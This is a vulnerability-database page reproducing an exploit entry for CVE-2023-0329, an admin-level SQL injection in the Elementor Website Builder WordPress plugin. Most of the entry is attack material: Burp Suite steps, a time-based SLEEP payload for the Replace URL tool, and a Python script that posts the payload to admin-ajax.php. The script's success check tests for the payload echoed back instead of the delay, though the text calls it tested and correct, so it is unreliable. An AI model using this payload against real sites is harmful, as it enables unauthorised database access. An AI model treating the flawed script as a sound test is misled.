Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Elementor Website Builder < 3.12.2 - Admin+ SQLi

🗓️ 02 Apr 2024 00:00:00Reported by E1 CodersType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 581 Views

Elementor Website Builder < 3.12.2 - Admin+ SQLi exploit: Use Burp Suite to intercept and execute SQL command causing a 2 sec delay, then execute Python script with requests library to confirm successful injectio

Related
Code
#EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi
#References
#CVE : CVE-2023-0329
#E1.Coders
 
#Open Burp Suite.
#In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080.
#Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080.
#Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page.
#On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL":
 
#code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);#
#Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request.
#Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward".
#The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection.
#Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s
# 
#References :  https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/
 
 
 
 
#Exploit Python  :
#The provided SQLi attack vector can be achieved using the following Python code with the "requests" library:
 
#This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection.
#Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct
 
import requests
 
# Set the target URL and SQLi payload
url = "http://localhost:8080/wp-admin/admin-ajax.php"
data = {
    "action": "elementor_ajax_save_builder",
    "editor_post_id": "1",
    "post_id": "1",
    "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#"
}
 
# Send the request to the target URL
response = requests.post(url, data=data)
 
# Check if the response indicates a successful SQL injection
if "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text:
    print("SQL Injection successful!")
else:
    print("SQL Injection failed.")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Apr 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 3.17.2
EPSS0.09142
elementor website buildersql injectionburp suitepythonrequests librarycve-2023-0329open bug suitesqli payloadresponse interception
581